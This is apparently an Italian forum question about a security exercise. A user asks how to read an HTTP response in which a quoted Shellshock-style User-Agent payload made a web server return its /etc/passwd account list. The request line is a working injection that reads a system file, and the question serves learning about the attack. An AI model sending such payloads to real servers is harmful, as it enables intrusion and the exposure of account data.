Sto lavorando a una domanda che coinvolge qualcuno che utilizza una vulnerabilità in un server Linux per accedervi. La prima parte della domanda afferma
Nel monitorare l'attività di rete tra un server Web Gold e Tech critico IP estraneo non attendibile, Bob rileva la seguente richiesta GET HTTP dall'IP non attendibile:
GET /cgi-bin/status/status.cgi HTTP/1.1
Host: motherlode.goldminetech.edu
User-Agent: () { :;}; echo "PWNED by 0c007: “ $(</etc/passwd)
Capisco qui che viene utilizzata un'iniezione di script di shell quando viene eseguito il comando $(</etc/passwd) , che consente all'hacker di accedere a questa cartella di password. Quindi, una risposta HTTP è elencata qui:
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: length
root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh
nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
paul:!:201:1::/home/paul:/usr/bin/ksh
jdoe:*:202:1:John Doe:/home/jdoe:/usr/bin/ksh
Dovrei determinare a cosa l'hacker ha avuto accesso. Qui è dove sono bloccato, in quanto non riesco a decifrare questa risposta. Mi sono guardato intorno e non riesco a trovare nulla che spieghi come leggere una risposta HTTP da un server Linux. Qualsiasi aiuto sarebbe molto apprezzato.